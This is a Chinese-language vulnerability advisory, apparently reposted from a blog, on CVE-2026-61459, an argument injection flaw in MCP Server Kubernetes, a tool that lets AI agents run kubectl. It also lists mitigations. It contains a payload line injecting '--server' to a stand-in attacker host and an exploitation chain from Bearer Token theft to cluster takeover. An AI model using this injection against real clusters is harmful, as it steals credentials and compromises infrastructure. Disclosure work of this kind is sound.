紧急安全预警|MCPServerKubernetes爆出高危参数注入漏洞(CVE-2026-61459),可导致Kubernetes集群完全沦陷

admin 2026-07-13 05:31:27 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: MCPServerKubernetes存在高危参数注入漏洞CVE-2026-61459,影响3.9.0以下版本。攻击者可通过构造带前导短横线的参数绕过安全检查,注入–server参数窃取BearerToken,导致集群完全沦陷。官方已发布3.9.0修复版本,建议立即升级并轮换Token。 综合评分: 88 文章分类: 漏洞分析,红队,安全工具


cover_image

紧急安全预警|MCP Server Kubernetes 爆出高危参数注入漏洞(CVE-2026-61459),可导致 Kubernetes 集群完全沦陷

原创

tuto tuto

杂杂咱谈

2026年7月12日 09:59 福建

在小说阅读器读本章

去阅读

漏洞概况

研究人员披露 MCP Server Kubernetes 存在一项高危参数注入漏洞(CVE-2026-61459),影响 3.9.0 之前所有版本

漏洞存在于 MCP Server Kubernetes 的 kubectl_getkubectl_describe 以及 kubectl_delete 等结构化工具中。由于参数校验逻辑存在缺陷,攻击者可通过构造带有前导短横线(-)的参数绕过安全检查,并向底层 kubectl 命令注入任意参数。

其中最危险的利用方式是注入 --server 参数,将 kubectl 请求重定向至攻击者控制的 Kubernetes API Server,诱导客户端自动发送 Bearer Token,最终导致 Kubernetes 集群完全失陷。

漏洞 CVSS 评分高达 9.8 (Critical),官方已在 3.9.0 版本完成修复。


漏洞时间线

| 时间 | 事件 | | — | — | | 2026-07-10 | 漏洞公开披露 (CVE-2026-61459) | | 同日 | 官方发布修复版本 3.9.0 | | 当前 | 建议所有用户立即升级 |


受影响产品

| 项目 | 内容 | | — | — | | 产品 | MCP Server Kubernetes | | 漏洞编号 | CVE-2026-61459 | | 漏洞类型 | 参数注入 (Argument Injection) | | CWE | CWE-88 | | CVSS | 9.8 (Critical) | | 利用条件 | 无需身份认证 | | 修复版本 | 3.9.0 |

受影响版本

| 产品 | 受影响版本 | 修复版本 | | — | — | — | | MCP Server Kubernetes | < 3.9.0 | 3.9.0 |


漏洞分析

什么是 MCP Server Kubernetes?

MCP Server Kubernetes 是 Model Context Protocol 生态中的 Kubernetes 服务组件。

它能够为 AI Agent 提供 Kubernetes 集群上下文,并代表 AI 调用:

  • kubectl get
  • kubectl describe
  • kubectl delete
  • port-forward

等 Kubernetes 管理命令,使 AI 能够直接管理 Kubernetes 集群。

随着 AI Agent 平台的发展,MCP Server Kubernetes 已成为许多智能运维(AIOps) 和 Agent 工作流的重要组成部分。


漏洞根因

参数校验存在缺陷

漏洞源于安全检查函数:

assertNoDangerousFlags()

该函数原本用于阻止危险参数传递给 kubectl。

然而,当攻击者构造以下参数时:

resourceType:
--server=https://attacker.example.com

由于参数以前导 “-“ 开头,安全检查未能正确识别。

最终导致:

用户输入

↓

MCP Server

↓

assertNoDangerousFlags()

↓

检查绕过

↓

kubectl

攻击者成功向 kubectl 注入:–server 参数。


漏洞利用链

漏洞利用流程

整个攻击链如下:

攻击者发现运行 <3.9.0 的 MCP Server

↓

构造恶意请求

resourceType:
--server=https://attacker.example.com

↓

绕过 assertNoDangerousFlags()

↓

kubectl 被重定向到攻击者 API Server

↓

Authorization:
Bearer Token 自动发送

↓

攻击者获取 Kubernetes Bearer Token

↓

登录真实 Kubernetes API

↓

完全控制整个集群

为什么能够窃取 Token?

kubectl 在访问 Kubernetes API Server 时,会自动携带:

Authorization:
Bearer <TOKEN>

当攻击者将:–server 修改为自己的服务器后,kubectl 会主动连接攻击者服务器,

并自动发送:

Kubernetes Bearer Token

攻击者即可利用该 Token 登录真实 Kubernetes API。


第二条攻击路径

研究人员进一步发现:

除了 CVE 中公开的:

  • kubectl_get
  • kubectl_describe
  • kubectl_delete

之外,

port_forward 功能同样存在相同问题。

其内部同样会将用户输入直接传递给 kubectl,

因此也可注入:–server 实现 Bearer Token 窃取。

官方在 3.9.0 中已同时修复该问题。


漏洞影响

成功利用后,攻击者可直接获得 Kubernetes 集群控制权限。

Bearer Token 窃取

攻击者可:

  • 窃取 Operator Bearer Token
  • 获取 Kubernetes API 访问权限

Kubernetes 集群接管

利用窃取的 Token,可进一步:

  • 创建 Pod
  • 删除资源
  • 修改 Deployment
  • 控制整个 Kubernetes 集群

敏感数据泄露

攻击者可读取:

  • Kubernetes Secrets
  • ConfigMaps
  • ServiceAccount
  • Pod 配置
  • 集群元数据

部署恶意工作负载

攻击者能够:

  • 部署恶意容器
  • 植入后门
  • 挖矿程序
  • 持久化控制

横向移动

利用 Kubernetes 权限,

攻击者还可能:

  • 攻击内部微服务
  • 访问数据库
  • 横向渗透企业内网

对于运行 AI Agent 的 Kubernetes 环境而言,风险尤其严重。


官方修复情况

官方已在:

MCP Server Kubernetes 3.9.0

修复:

  • kubectl_get
  • kubectl_describe
  • kubectl_delete
  • port_forward

中的参数注入问题。


防护建议

1、立即升级

升级至:

npm install [email protected]

这是唯一完整修复方案。


2、限制 MCP 工具访问权限

在完成升级前,

建议仅允许可信用户访问:

  • kubectl_get
  • kubectl_describe
  • kubectl_delete
  • port_forward

避免未授权用户调用。


3、轮换 Kubernetes Bearer Token

如果服务器在升级前曾接收来自不可信来源的输入,应立即:

  • 更换 ServiceAccount Bearer Token
  • 吊销旧 Token
  • 检查 API Server 审计日志

确认是否存在异常访问。


4、加强网络隔离

建议:

  • 不要将 MCP Server 暴露至公网;
  • 通过防火墙限制访问来源;
  • 仅允许可信网络访问 MCP 服务。

5、遵循最小权限原则

为 MCP Server 使用的 ServiceAccount 配置最小权限 RBAC,避免赋予 cluster-admin 等高权限角色,降低漏洞被利用后的影响范围。


总结

CVE-2026-61459 是 MCP Server Kubernetes 中一项影响严重的参数注入漏洞。攻击者无需身份认证,仅需构造带有前导短横线的 resourceType 或相关参数,即可绕过 assertNoDangerousFlags() 安全检查,向底层 kubectl 注入 --server 参数,将请求重定向至恶意 Kubernetes API 服务,从而窃取 Operator 的 Bearer Token

由于 MCP Server Kubernetes 通常部署于 AI Agent 或智能运维平台中,并拥有较高的 Kubernetes 集群权限,一旦 Token 泄露,攻击者即可完全控制 Kubernetes 集群、访问敏感资源并部署恶意工作负载。建议所有用户立即升级至 3.9.0,同时轮换 Bearer Token、限制 MCP 工具访问范围,并实施最小权限 RBAC,以有效降低攻击风险。

Simple #CVE-2026-61459 #MCP Server Kubernetes


免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:杂杂咱谈 tuto tuto《紧急安全预警|MCP Server Kubernetes 爆出高危参数注入漏洞(CVE-2026-61459),可导致 Kubernetes 集群完全沦陷》

评论:0   参与:  0